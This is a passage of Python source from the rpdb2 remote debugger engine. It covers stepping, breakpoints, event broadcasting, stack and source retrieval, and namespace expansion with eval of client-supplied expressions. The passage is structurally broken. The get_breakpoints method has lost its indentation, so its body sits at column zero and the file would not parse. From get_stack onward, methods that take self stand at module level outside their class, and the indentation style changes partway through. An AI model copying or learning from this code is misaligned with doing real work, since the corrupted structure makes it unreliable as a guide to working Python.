            self.m_fUnhandledException = False
            self.m_state_manager.set_state(STATE_RUNNING, fLock = False)
            if self.m_fembedded:
                # Give embedded clients a moment before flipping the flag.
                time.sleep(0.33)
            self.set_break_flag()
        finally:
            if fLock:
                self.m_state_manager.release()
    def request_go_breakpoint(self, filename, scope, lineno, frame_index, fException):
        """
        Let debugger run until temp breakpoint as defined in the arguments.
        """
        assert(is_unicode(filename))
        assert(is_unicode(scope))
        try:
            self.m_state_manager.acquire()
            self.verify_broken()
            if filename in [None, '']:
                # No filename given: target the source of the selected frame.
                _filename = self.get_current_filename(frame_index, fException)
            elif not is_provider_filesystem(filename):
                _filename = as_string(filename, sys.getfilesystemencoding())
            else:
                _filename = FindFile(filename, fModules = True)
            self.m_bp_manager.set_temp_breakpoint(_filename, scope, lineno)
            self.set_all_tracers()
            self.request_go(fLock = False)
        finally:
            self.m_state_manager.release()
    def request_step_quiet(self, fLock = True):
        """Like request_step() but silently ignore DebuggerNotBroken."""
        try:
            self.request_step(fLock)
        except DebuggerNotBroken:
            pass
    def request_step(self, fLock = True):
        """
        Let debugger run until next statement is reached or a breakpoint
        is hit in another thread.
        """
        try:
            if fLock:
                self.m_state_manager.acquire()
            self.verify_broken()
            try:
                ctx = self.get_current_ctx()
            except NoThreads:
                return
            # Step: break on the next event in this thread, any frame.
            self.m_step_tid = ctx.m_thread_id
            self.m_next_frame = None
            self.m_return_frame = None
            self.request_go(fLock = False)
        finally:
            if fLock:
                self.m_state_manager.release()
    def request_next(self):
        """
        Let debugger run until next statement in the same frame
        is reached or a breakpoint is hit in another thread.
        """
        try:
            self.m_state_manager.acquire()
            self.verify_broken()
            try:
                ctx = self.get_current_ctx()
            except NoThreads:
                return
            if self.m_lastest_event in ['return', 'exception']:
                # The frame is about to unwind; 'next' degrades to 'step'.
                return self.request_step(fLock = False)
            self.m_next_frame = ctx.m_frame
            self.m_return_frame = None
            self.request_go(fLock = False)
        finally:
            self.m_state_manager.release()
    def request_return(self):
        """
        Let debugger run until end of frame frame is reached
        or a breakpoint is hit in another thread.
        """
        try:
            self.m_state_manager.acquire()
            self.verify_broken()
            try:
                ctx = self.get_current_ctx()
            except NoThreads:
                return
            if self.m_lastest_event == 'return':
                # Already at a return event; degrade to 'step'.
                return self.request_step(fLock = False)
            self.m_next_frame = None
            self.m_return_frame = ctx.m_frame
            self.request_go(fLock = False)
        finally:
            self.m_state_manager.release()
    def request_jump(self, lineno):
        """
        Jump to line number 'lineno'.
        """
        try:
            self.m_state_manager.acquire()
            self.verify_broken()
            try:
                ctx = self.get_current_ctx()
            except NoThreads:
                return
            frame = ctx.m_frame
            code = frame.f_code
            valid_lines = CalcValidLines(code)
            sbi = CScopeBreakInfo(as_unicode(''), valid_lines)
            # Snap the requested line to the nearest valid scope line.
            l = sbi.CalcScopeLine(lineno)
            frame.f_lineno = l
        finally:
            # Drop the frame reference before releasing the state lock.
            frame = None
            self.m_state_manager.release()
        self.send_events(None)
    def set_thread(self, tid):
        """
        Switch focus to specified thread.
        """
        try:
            self.m_state_manager.acquire()
            self.verify_broken()
            try:
                if (tid >= 0) and (tid < 100):
                    # Small values are treated as an index into the
                    # thread list rather than a real thread id.
                    _tid = list(self.m_threads.keys())[tid]
                else:
                    _tid = tid
                ctx = self.m_threads[_tid]
            except (IndexError, KeyError):
                raise ThreadNotFound
            self.m_current_ctx = ctx
            self.m_lastest_event = ctx.m_event
        finally:
            self.m_state_manager.release()
        self.send_events(None)
class CDebuggerEngine(CDebuggerCore):
    """
    Main class for the debugger.
    Adds functionality on top of CDebuggerCore.
    """
    def __init__(self, fembedded = False):
        CDebuggerCore.__init__(self, fembedded)
        # All event types a client may wait for through the event queue.
        event_type_dict = {
            CEventState: {},
            CEventStackDepth: {},
            CEventBreakpoint: {},
            CEventThreads: {},
            CEventNoThreads: {},
            CEventThreadBroken: {},
            CEventNamespace: {},
            CEventUnhandledException: {},
            CEventStack: {},
            CEventNull: {},
            CEventExit: {},
            CEventForkSwitch: {},
            CEventExecSwitch: {},
            CEventSynchronicity: {},
            CEventTrap: {},
            CEventForkMode: {},
            CEventPsycoWarning: {},
            CEventConflictingModules: {},
            CEventSignalIntercepted: {},
            CEventSignalException: {},
            CEventClearSourceCache: {},
            CEventEmbeddedSync: {}
        }
        self.m_event_queue = CEventQueue(self.m_event_dispatcher)
        self.m_event_queue.register_event_types(event_type_dict)
        # A sync request from a client triggers a full state broadcast
        # via send_events().
        event_type_dict = {CEventSync: {}}
        self.m_event_dispatcher.register_callback(self.send_events, event_type_dict, fSingleUse = False)
    def shutdown(self):
        """Shut down the event queue, then the core debugger."""
        self.m_event_queue.shutdown()
        CDebuggerCore.shutdown(self)
    def sync_with_events(self, fException, fSendUnhandled):
        """
        Send debugger state to client.

        Returns the event-queue index captured before firing, so the
        caller can wait for the events produced by this sync.
        """
        if len(self.m_threads) == 0:
            self.wait_for_first_thread()
        index = self.m_event_queue.get_event_index()
        event = CEventSync(fException, fSendUnhandled)
        self.m_event_dispatcher.fire_event(event)
        return index
    def trap_conflicting_modules(self):
        """
        Report newly imported modules known to conflict with the
        debugger. Returns True if any new conflicting module was found.
        """
        modules_list = []
        for m in CONFLICTING_MODULES:
            if m in g_found_conflicting_modules:
                # Already reported.
                continue
            if not m in sys.modules:
                continue
            if m == 'psyco':
                #
                # Old event kept for compatibility.
                #
                event = CEventPsycoWarning()
                self.m_event_dispatcher.fire_event(event)
            g_found_conflicting_modules.append(m)
            modules_list.append(as_unicode(m))
        if modules_list == []:
            return False
        event = CEventConflictingModules(modules_list)
        self.m_event_dispatcher.fire_event(event)
        return True
    def wait_for_event(self, timeout, event_index):
        """
        Wait for new events and return them as list of events.
        """
        # A client is actively polling: cancel any give-up timer.
        self.cancel_request_go_timer()
        self.trap_conflicting_modules()
        (new_event_index, sel) = self.m_event_queue.wait_for_event(timeout, event_index)
        if self.trap_conflicting_modules():
            # A conflict event was fired during the wait; wait again so
            # it is included in the returned batch.
            (new_event_index, sel) = self.m_event_queue.wait_for_event(timeout, event_index)
        return (new_event_index, sel)
    def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding):
        """
        Create/replace a breakpoint and broadcast the change to clients.
        """
        print_debug('Setting breakpoint to: %s, %s, %d' % (repr(filename), scope, lineno))
        assert(is_unicode(filename))
        assert(is_unicode(scope))
        assert(is_unicode(expr))
        fLock = False
        try:
            if filename in [None, '']:
                # Resolving the current frame requires a broken debuggee,
                # so take the state lock only on this path.
                self.m_state_manager.acquire()
                fLock = True
                self.verify_broken()
                _filename = self.get_current_filename(frame_index, fException)
            elif not is_provider_filesystem(filename):
                _filename = as_string(filename, sys.getfilesystemencoding())
            else:
                _filename = FindFile(filename, fModules = True)
            if expr != '':
                # Validate the conditional expression up front; any
                # failure is reported uniformly as a syntax error.
                try:
                    encoding = self.__calc_encoding(encoding, filename = _filename)
                    _expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding)
                    compile(_expr, '<string>', 'eval')
                except:
                    raise SyntaxError
            encoding = as_unicode(encoding)
            bp = self.m_bp_manager.set_breakpoint(_filename, scope, lineno, fEnabled, expr, encoding)
            self.set_all_tracers()
            event = CEventBreakpoint(bp)
            #print_debug(repr(vars(bp)))
            self.m_event_dispatcher.fire_event(event)
        finally:
            if fLock:
                self.m_state_manager.release()
    def disable_breakpoint(self, id_list, fAll):
        """Disable the breakpoints in id_list (or all) and notify clients."""
        self.m_bp_manager.disable_breakpoint(id_list, fAll)
        self.set_all_tracers()
        event = CEventBreakpoint(None, CEventBreakpoint.DISABLE, id_list, fAll)
        self.m_event_dispatcher.fire_event(event)
    def enable_breakpoint(self, id_list, fAll):
        """Enable the breakpoints in id_list (or all) and notify clients."""
        self.m_bp_manager.enable_breakpoint(id_list, fAll)
        self.set_all_tracers()
        event = CEventBreakpoint(None, CEventBreakpoint.ENABLE, id_list, fAll)
        self.m_event_dispatcher.fire_event(event)
    def delete_breakpoint(self, id_list, fAll):
        """Delete the breakpoints in id_list (or all) and notify clients."""
        self.m_bp_manager.delete_breakpoint(id_list, fAll)
        self.set_all_tracers()
        event = CEventBreakpoint(None, CEventBreakpoint.REMOVE, id_list, fAll)
        self.m_event_dispatcher.fire_event(event)
def get_breakpoints(self):
"""
return id->breakpoint dictionary.
"""
bpl = self.m_bp_manager.get_breakpoints()
_items = [(id, breakpoint_copy(bp)) for (id, bp) in bpl.items()]
for (id, bp) in _items:
bp.m_code = None
_bpl = dict(_items)
return _bpl
    def send_events(self, event):
        """
        Send series of events that define the debugger state.
        """
        if isinstance(event, CEventSync):
            fException = event.m_fException
            fSendUnhandled = event.m_fSendUnhandled
        else:
            fException = False
            fSendUnhandled = False
        try:
            if isinstance(event, CEventSync) and not fException:
                # Re-broadcast the current state to the sync requester.
                self.m_state_manager.set_state()
            self.send_stack_depth()
            self.send_threads_event(fException)
            self.send_stack_event(fException)
            self.send_namespace_event()
            if fSendUnhandled and self.m_fUnhandledException:
                self.send_unhandled_exception_event()
        except NoThreads:
            self.send_no_threads_event()
        except:
            print_debug_exception()
            raise
    def send_unhandled_exception_event(self):
        """Notify clients that an unhandled exception was trapped."""
        event = CEventUnhandledException()
        self.m_event_dispatcher.fire_event(event)
    def send_stack_depth(self):
        """
        Send event with stack depth and exception stack depth.
        """
        f = None
        tb = None
        ctx = self.get_current_ctx()
        try:
            try:
                f = ctx.frame_acquire()
            except ThreadDone:
                return
            s = my_extract_stack(f)
            # Hide the debugger's own import-wrapper frames unless
            # debugging rpdb2 itself (g_fDebug).
            s = [1 for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
            stack_depth = len(s)
            tb = get_traceback(f, ctx)
            if tb == None:
                stack_depth_exception = None
            else:
                s = my_extract_stack(tb.tb_frame.f_back)
                s += my_extract_tb(tb)
                s = [1 for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
                stack_depth_exception = len(s)
            event = CEventStackDepth(stack_depth, stack_depth_exception)
            self.m_event_dispatcher.fire_event(event)
        finally:
            # Drop frame/traceback references before releasing.
            f = None
            tb = None
            ctx.frame_release()
    def send_threads_event(self, fException):
        """
        Send event with current thread list.
        In case of exception, send only the current thread.
        """
        tl = self.get_thread_list()
        if fException:
            # Keep only the entry of the current thread.
            ctid = tl[0]
            itl = tl[1]
            _itl = [a for a in itl if a[DICT_KEY_TID] == ctid]
            _tl = (ctid, _itl)
        else:
            _tl = tl
        event = CEventThreads(*_tl)
        self.m_event_dispatcher.fire_event(event)
    def send_stack_event(self, fException):
        """Broadcast the current thread's stack, if one is available."""
        sl = self.get_stack([], False, fException)
        if len(sl) == 0:
            return
        event = CEventStack(sl[0])
        self.m_event_dispatcher.fire_event(event)
    def send_namespace_event(self):
        """
        Send event notifying namespace should be queried again.
        """
        event = CEventNamespace()
        self.m_event_dispatcher.fire_event(event)
    def send_no_threads_event(self):
        """Notify clients that no debuggee threads are alive."""
        _event = CEventNoThreads()
        self.m_event_dispatcher.fire_event(_event)
    def send_event_null(self):
        """
        Make the event waiter return.
        """
        event = CEventNull()
        self.m_event_dispatcher.fire_event(event)
    def __get_stack(self, ctx, ctid, fException):
        """
        Build the stack-description dictionary for one thread context.
        Returns None if the thread is already gone.
        """
        tid = ctx.m_thread_id
        f = None
        _f = None
        tb = None
        _tb = None
        try:
            try:
                f = ctx.frame_acquire()
            except ThreadDone:
                return None
            if fException:
                tb = get_traceback(f, ctx)
                if tb == None:
                    raise NoExceptionFound
                # Walk to the innermost traceback entry.
                _tb = tb
                while _tb.tb_next is not None:
                    _tb = _tb.tb_next
                _f = _tb.tb_frame
                s = my_extract_stack(tb.tb_frame.f_back)
                s += my_extract_tb(tb)
            else:
                _f = f
                s = my_extract_stack(f)
            # Collect per-frame code identifiers (address tokens parsed
            # out of repr(f_code)), outermost first.
            code_list = []
            while _f is not None:
                rc = repr(_f.f_code).split(',')[0].split()[-1]
                rc = as_unicode(rc)
                code_list.insert(0, rc)
                _f = _f.f_back
        finally:
            # Drop all frame/traceback references before releasing.
            f = None
            _f = None
            tb = None
            _tb = None
            ctx.frame_release()
        #print code_list
        # Hide the debugger's own import-wrapper frames.
        __s = [(a, b, c, d) for (a, b, c, d) in s if g_fDebug or c != 'rpdb2_import_wrapper']
        if (ctx.m_uef_lineno is not None) and (len(__s) > 0):
            # Replace the outermost line number with the one recorded at
            # the unhandled-exception point.
            (a, b, c, d) = __s[0]
            __s = [(a, ctx.m_uef_lineno, c, d)] + __s[1:]
        r = {}
        r[DICT_KEY_STACK] = __s
        r[DICT_KEY_CODE_LIST] = code_list
        r[DICT_KEY_TID] = tid
        r[DICT_KEY_BROKEN] = ctx.m_fBroken
        r[DICT_KEY_EVENT] = as_unicode([ctx.m_event, 'exception'][fException])
        if tid == ctid:
            r[DICT_KEY_CURRENT_TID] = True
        return r
def get_stack(self, tid_list, fAll, fException):
    """
    Return a list of stack descriptions, one per requested thread.
    With fException, only the current thread may be queried.
    """
    if fException and (fAll or len(tid_list) != 0):
        raise BadArgument

    current_ctx = self.get_current_ctx()
    ctid = current_ctx.m_thread_id

    if fAll:
        contexts = list(self.get_threads().values())
    elif fException or len(tid_list) == 0:
        contexts = [current_ctx]
    else:
        threads = self.get_threads()
        contexts = [threads.get(t, None) for t in tid_list]

    stacks = []
    for c in contexts:
        if c is None:
            continue
        s = self.__get_stack(c, ctid, fException)
        if s is not None:
            stacks.append(s)

    return stacks
def get_source_file(self, filename, lineno, nlines, frame_index, fException):
    """
    Return a dictionary describing 'nlines' source lines of 'filename'
    starting at 'lineno' (lineno < 1 means the whole file), including
    per-line breakpoint state.  When the file is the selected frame's
    file, the frame's line number and event are included as well.
    """
    assert(is_unicode(filename))

    if lineno < 1:
        # Whole-file request.
        lineno = 1
        nlines = -1

    _lineno = lineno
    r = {}
    frame_filename = None

    try:
        ctx = self.get_current_ctx()

        try:
            f = None
            base_frame = None

            base_frame = ctx.frame_acquire()
            (f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
            frame_filename = calc_frame_path(f)

        finally:
            # Drop frame references promptly to avoid reference cycles.
            f = None
            base_frame = None
            ctx.frame_release()

        frame_event = [[ctx.m_event, 'call'][frame_index > 0], 'exception'][fException]

    except NoThreads:
        # Without any thread we can still serve an explicitly named file.
        if filename in [None, '']:
            raise

    if filename in [None, '']:
        # No filename given: serve the selected frame's file.
        __filename = frame_filename
        r[DICT_KEY_TID] = ctx.m_thread_id
    elif not is_provider_filesystem(filename):
        __filename = as_string(filename, sys.getfilesystemencoding())
    else:
        __filename = FindFile(filename, fModules = True)
        if not IsPythonSourceFile(__filename):
            raise NotPythonSource

    _filename = winlower(__filename)

    lines = []
    breakpoints = {}
    fhide_pwd_mode = False

    while nlines != 0:
        try:
            g_traceback_lock.acquire()
            line = get_source_line(_filename, _lineno)

        finally:
            g_traceback_lock.release()

        if line == '':
            break

        #
        # Remove any trace of session password from data structures that
        # go over the network.
        #

        if fhide_pwd_mode:
            # Keep masking until the closing parenthesis is found.
            if not ')' in line:
                line = as_unicode('...\n')
            else:
                line = '...""")' + line.split(')', 1)[1]
                fhide_pwd_mode = False

        elif 'start_embedded_debugger(' in line:
            ls = line.split('start_embedded_debugger(', 1)
            line = ls[0] + 'start_embedded_debugger("""...Removed-password-from-output...'

            if ')' in ls[1]:
                line += '""")' + ls[1].split(')', 1)[1]
            else:
                line += '\n'
                fhide_pwd_mode = True

        lines.append(line)

        try:
            bp = self.m_bp_manager.get_breakpoint(_filename, _lineno)
            breakpoints[_lineno] = as_unicode([STATE_DISABLED, STATE_ENABLED][bp.isEnabled()])
        except KeyError:
            pass

        _lineno += 1
        nlines -= 1

    if frame_filename == _filename:
        # NOTE(review): frame_lineno/frame_event are unbound when NoThreads
        # was swallowed above, but that path leaves frame_filename as None,
        # which cannot equal _filename - so this branch is then skipped.
        r[DICT_KEY_FRAME_LINENO] = frame_lineno
        r[DICT_KEY_EVENT] = as_unicode(frame_event)
        r[DICT_KEY_BROKEN] = ctx.m_fBroken

    r[DICT_KEY_LINES] = lines
    r[DICT_KEY_FILENAME] = as_unicode(_filename, sys.getfilesystemencoding())
    r[DICT_KEY_BREAKPOINTS] = breakpoints
    r[DICT_KEY_FIRST_LINENO] = lineno

    return r
def __get_source(self, ctx, nlines, frame_index, fException):
    """
    Return a dictionary with up to 'nlines' source lines centered on the
    current line of the selected frame of thread 'ctx', plus per-line
    breakpoint state.  Returns None if the thread is done or the frame
    index is invalid.
    """
    tid = ctx.m_thread_id

    # Only the currently selected thread honors the frame index.
    _frame_index = [0, frame_index][tid == self.m_current_ctx.m_thread_id]

    try:
        try:
            f = None
            base_frame = None

            base_frame = ctx.frame_acquire()
            (f, frame_lineno) = ctx.get_frame(base_frame, _frame_index, fException)
            frame_filename = calc_frame_path(f)

        except (ThreadDone, InvalidFrame):
            return None

    finally:
        # Drop frame references promptly to avoid reference cycles.
        f = None
        base_frame = None
        ctx.frame_release()

    frame_event = [[ctx.m_event, 'call'][frame_index > 0], 'exception'][fException]

    # Center the window on the frame's current line.
    first_line = max(1, frame_lineno - nlines // 2)
    _lineno = first_line

    lines = []
    breakpoints = {}
    fhide_pwd_mode = False

    while nlines != 0:
        try:
            g_traceback_lock.acquire()
            line = get_source_line(frame_filename, _lineno)

        finally:
            g_traceback_lock.release()

        if line == '':
            break

        #
        # Remove any trace of session password from data structures that
        # go over the network.
        #

        if fhide_pwd_mode:
            # Keep masking until the closing parenthesis is found.
            if not ')' in line:
                line = as_unicode('...\n')
            else:
                line = '...""")' + line.split(')', 1)[1]
                fhide_pwd_mode = False

        elif 'start_embedded_debugger(' in line:
            ls = line.split('start_embedded_debugger(', 1)
            line = ls[0] + 'start_embedded_debugger("""...Removed-password-from-output...'

            if ')' in ls[1]:
                line += '""")' + ls[1].split(')', 1)[1]
            else:
                line += '\n'
                fhide_pwd_mode = True

        lines.append(line)

        try:
            bp = self.m_bp_manager.get_breakpoint(frame_filename, _lineno)
            breakpoints[_lineno] = as_unicode([STATE_DISABLED, STATE_ENABLED][bp.isEnabled()])
        except KeyError:
            pass

        _lineno += 1
        nlines -= 1

    r = {}

    r[DICT_KEY_FRAME_LINENO] = frame_lineno
    r[DICT_KEY_EVENT] = as_unicode(frame_event)
    r[DICT_KEY_BROKEN] = ctx.m_fBroken
    r[DICT_KEY_TID] = tid
    r[DICT_KEY_LINES] = lines
    r[DICT_KEY_FILENAME] = as_unicode(frame_filename, sys.getfilesystemencoding())
    r[DICT_KEY_BREAKPOINTS] = breakpoints
    r[DICT_KEY_FIRST_LINENO] = first_line

    return r
def get_source_lines(self, nlines, fAll, frame_index, fException):
    """
    Return source-window descriptions for the current thread, or for all
    threads when fAll is set (fAll and fException are mutually exclusive).
    """
    if fException and fAll:
        raise BadArgument

    if fAll:
        contexts = list(self.get_threads().values())
    else:
        contexts = [self.get_current_ctx()]

    results = []
    for c in contexts:
        r = self.__get_source(c, nlines, frame_index, fException)
        if r is not None:
            results.append(r)

    return results
def __get_locals_globals(self, frame_index, fException, fReadOnly = False):
    """Return (globals, locals, original-locals-copy) for the selected frame."""
    ctx = self.get_current_ctx()
    (frame_globals, frame_locals, original_locals_copy) = ctx.get_locals_copy(frame_index, fException, fReadOnly)
    return (frame_globals, frame_locals, original_locals_copy)
def __calc_number_of_subnodes(self, r):
    """
    Return the number of child nodes object 'r' would expand to in the
    namespace viewer, or 0 for scalar-like values.
    """
    # Scalars (and None) never expand.  Identity check on the exact type,
    # so subclasses fall through to the container/attribute logic below.
    for t in [bytearray, bytes, str, str8, unicode, int, long, float, bool, type(None)]:
        if t is type(r):
            return 0

    try:
        try:
            if isinstance(r, frozenset) or isinstance(r, set):
                return len(r)
        except NameError:
            # Builtin set/frozenset are missing on very old interpreters.
            pass

        if isinstance(r, sets.BaseSet):
            return len(r)

        if isinstance(r, dict):
            return len(r)

        if isinstance(r, list):
            return len(r)

        if isinstance(r, tuple):
            return len(r)

        # Generic object: one child per attribute.
        return len(dir(r))

    except AttributeError:
        return 0

    return 0
def __calc_subnodes(self, expr, r, fForceNames, filter_level, repr_limit, encoding):
    """
    Expand object 'r' (the value of expression 'expr') into a list of
    child-node dictionaries for the namespace viewer.  Handles set-like
    containers, lists/tuples, dicts and generic objects.  Output is
    capped at MAX_NAMESPACE_ITEMS entries; a MAX_NAMESPACE_WARNING entry
    is appended when the container was truncated.
    """
    snl = []

    def append_set_member(i):
        # Describe one member of a set-like container.  Sets are not
        # indexable, so the child expression re-locates the member by
        # its repr via _RPDB2_FindRepr.
        is_valid = [True]
        rk = repr_ltd(i, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)

        e = {}
        # BUGFIX: escape embedded double quotes.  The original replaced
        # '"' with itself (a no-op), producing an unparsable child
        # expression whenever the repr contained a quote.
        e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '\\"')))
        e[DICT_KEY_NAME] = repr_ltd(i, repr_limit, encoding)
        e[DICT_KEY_REPR] = repr_ltd(i, repr_limit, encoding, is_valid)
        e[DICT_KEY_IS_VALID] = is_valid[0]
        e[DICT_KEY_TYPE] = as_unicode(parse_type(type(i)))
        e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(i)

        snl.append(e)

    try:
        if isinstance(r, frozenset) or isinstance(r, set):
            # Sort small sets for stable display; large ones are listed
            # in iteration order to avoid an expensive sort.
            if len(r) > MAX_SORTABLE_LENGTH:
                g = r
            else:
                g = [i for i in r]
                sort(g)

            for i in g:
                if len(snl) >= MAX_NAMESPACE_ITEMS:
                    snl.append(MAX_NAMESPACE_WARNING)
                    break
                append_set_member(i)

            return snl

    except NameError:
        # Builtin set/frozenset are missing on very old interpreters.
        pass

    if isinstance(r, sets.BaseSet):
        # Legacy 'sets' module support (pre-builtin-set interpreters).
        if len(r) > MAX_SORTABLE_LENGTH:
            g = r
        else:
            g = [i for i in r]
            sort(g)

        for i in g:
            if len(snl) >= MAX_NAMESPACE_ITEMS:
                snl.append(MAX_NAMESPACE_WARNING)
                break
            append_set_member(i)

        return snl

    if isinstance(r, list) or isinstance(r, tuple):
        for i, v in enumerate(r[0: MAX_NAMESPACE_ITEMS]):
            is_valid = [True]
            e = {}
            e[DICT_KEY_EXPR] = as_unicode('(%s)[%d]' % (expr, i))
            e[DICT_KEY_NAME] = as_unicode(repr(i))
            e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
            e[DICT_KEY_IS_VALID] = is_valid[0]
            e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
            e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)

            snl.append(e)

        if len(r) > MAX_NAMESPACE_ITEMS:
            snl.append(MAX_NAMESPACE_WARNING)

        return snl

    if isinstance(r, dict):
        if filter_level == 2 and expr in ['locals()', 'globals()']:
            # At the strictest filter level hide functions/classes from
            # the top-level namespaces; work on a copy to avoid mutating
            # the real namespace dict.
            r = copy.copy(r)
            for k, v in list(r.items()):
                if parse_type(type(v)) in ['function', 'classobj', 'type']:
                    del r[k]

        if len(r) > MAX_SORTABLE_LENGTH:
            kl = r
        else:
            kl = list(r.keys())
            sort(kl)

        for k in kl:
            #
            # Remove any trace of session password from data structures
            # that go over the network.
            #
            if k in ['_RPDB2_FindRepr', '_RPDB2_builtins', '_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
                continue

            v = r[k]

            if len(snl) >= MAX_NAMESPACE_ITEMS:
                snl.append(MAX_NAMESPACE_WARNING)
                break

            is_valid = [True]
            e = {}

            # Prefer direct subscription when the key has a short,
            # faithful repr; otherwise fall back to _RPDB2_FindRepr.
            if [True for t in [bool, int, float, bytes, str, unicode, type(None)] if t is type(k)]:
                rk = repr(k)
                if len(rk) < REPR_ID_LENGTH:
                    e[DICT_KEY_EXPR] = as_unicode('(%s)[%s]' % (expr, rk))

            if type(k) is str8:
                rk = repr(k)
                if len(rk) < REPR_ID_LENGTH:
                    e[DICT_KEY_EXPR] = as_unicode('(%s)[str8(%s)]' % (expr, rk[1:]))

            if not DICT_KEY_EXPR in e:
                rk = repr_ltd(k, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)
                # BUGFIX: escape embedded double quotes (the original
                # replace was a no-op).
                e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '\\"')))

            e[DICT_KEY_NAME] = as_unicode([repr_ltd(k, repr_limit, encoding), k][fForceNames])
            e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
            e[DICT_KEY_IS_VALID] = is_valid[0]
            e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
            e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)

            snl.append(e)

        return snl

    # Generic object: expand its (filtered) attribute list.
    al = calc_attribute_list(r, filter_level)
    sort(al)

    for a in al:
        if a == 'm_rpdb2_pwd':
            # Never expose the session password.
            continue

        try:
            v = getattr(r, a)
        except AttributeError:
            continue

        if len(snl) >= MAX_NAMESPACE_ITEMS:
            snl.append(MAX_NAMESPACE_WARNING)
            break

        is_valid = [True]
        e = {}
        e[DICT_KEY_EXPR] = as_unicode('(%s).%s' % (expr, a))
        e[DICT_KEY_NAME] = as_unicode(a)
        e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
        e[DICT_KEY_IS_VALID] = is_valid[0]
        e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
        e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)

        snl.append(e)

    return snl
def get_exception(self, frame_index, fException):
    """
    Return a {'type', 'value', 'traceback'} dictionary describing the
    active exception of the current thread (all values None when there
    is no active exception on Python 3).
    """
    ctx = self.get_current_ctx()

    if is_py3k():
        exc_info = ctx.get_exc_info()
        # Fixed: 'is None' instead of '== None'; also renamed locals so
        # the builtins 'type' and 'traceback' module name are no longer
        # shadowed.
        if exc_info is None:
            return {'type': None, 'value': None, 'traceback': None}

        (exc_type, exc_value, exc_tb) = exc_info
        return {'type': exc_type, 'value': exc_value, 'traceback': exc_tb}

    # Python 2: exception state lives on the frame itself.
    try:
        f = None
        base_frame = None

        base_frame = ctx.frame_acquire()
        (f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)

        return {'type': f.f_exc_type, 'value': f.f_exc_value, 'traceback': f.f_exc_traceback}

    finally:
        # Drop frame references promptly to avoid reference cycles.
        f = None
        base_frame = None
        ctx.frame_release()
def is_child_of_failure(self, failed_expr_list, expr):
    """Return True if 'expr' extends any previously failed expression."""
    return any(expr.startswith(failed) for failed in failed_expr_list)
def calc_expr(self, expr, fExpand, filter_level, frame_index, fException, _globals, _locals, lock, event, rl, index, repr_limit, encoding):
    """
    Evaluate 'expr' and append its namespace-node description to result
    list 'rl' at slot 'index' (guarded by 'lock'); 'event' is set when
    done.  Runs on a worker thread so a hung evaluation cannot hang the
    caller (see get_namespace()).
    """
    e = {}

    try:
        __globals = _globals
        __locals = _locals

        if RPDB_EXEC_INFO in expr:
            # The evaluated expression can reach this local through the
            # locals() dict captured just below, so it is not dead code.
            rpdb_exception_info = self.get_exception(frame_index, fException)
            __globals = globals()
            __locals = locals()

        __locals['_RPDB2_FindRepr'] = _RPDB2_FindRepr

        is_valid = [True]
        # NOTE(review): 'expr' originates from the debugger client;
        # eval() here is by design - the debugger exists to run
        # client-supplied code.
        r = eval(expr, __globals, __locals)

        e[DICT_KEY_EXPR] = as_unicode(expr)
        e[DICT_KEY_REPR] = repr_ltd(r, repr_limit, encoding, is_valid)
        e[DICT_KEY_IS_VALID] = is_valid[0]
        e[DICT_KEY_TYPE] = as_unicode(parse_type(type(r)))
        e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(r)

        if fExpand and (e[DICT_KEY_N_SUBNODES] > 0):
            fForceNames = (expr in ['globals()', 'locals()']) or (RPDB_EXEC_INFO in expr)
            e[DICT_KEY_SUBNODES] = self.__calc_subnodes(expr, r, fForceNames, filter_level, repr_limit, encoding)
            e[DICT_KEY_N_SUBNODES] = len(e[DICT_KEY_SUBNODES])

    except:
        print_debug_exception()
        e[DICT_KEY_ERROR] = as_unicode(safe_repr(sys.exc_info()))

    lock.acquire()
    # Publish the result only if the caller is still waiting on this
    # slot (it may have timed out and filled it with 'error').
    if len(rl) == index:
        rl.append(e)
    lock.release()

    event.set()
def __calc_encoding(self, encoding, fvalidate = False, filename = None):
    """
    Resolve ENCODING_AUTO (and, with fvalidate, an unknown codec name)
    to a usable encoding: the source file's declared encoding when it
    can be determined, 'utf-8' otherwise.
    """
    if encoding != ENCODING_AUTO:
        if not fvalidate:
            return encoding

        try:
            codecs.lookup(encoding)
            return encoding
        except:
            # Unknown codec name: fall through to auto-detection.
            pass

    if filename is None:
        ctx = self.get_current_ctx()
        filename = ctx.m_code_context.m_filename

    try:
        return get_file_encoding(filename)
    except:
        return 'utf-8'
def get_namespace(self, nl, filter_level, frame_index, fException, repr_limit, encoding, fraw):
    """
    Expand each (expr, fExpand) pair in 'nl' into a namespace-node
    dictionary.  Each expression is evaluated on another thread with a
    2-second timeout so a stuck evaluation cannot hang this call; failed
    expressions (and their children) are skipped, and the whole loop
    aborts after more than 3 failures.
    """
    if fraw:
        encoding = ENCODING_RAW_I
    else:
        encoding = self.__calc_encoding(encoding, fvalidate = True)

    try:
        (_globals, _locals, x) = self.__get_locals_globals(frame_index, fException, fReadOnly = True)
    except:
        print_debug_exception()
        raise

    failed_expr_list = []
    rl = []
    index = 0

    # Guards 'rl' against races with calc_expr() workers.
    lock = threading.Condition()

    for (expr, fExpand) in nl:
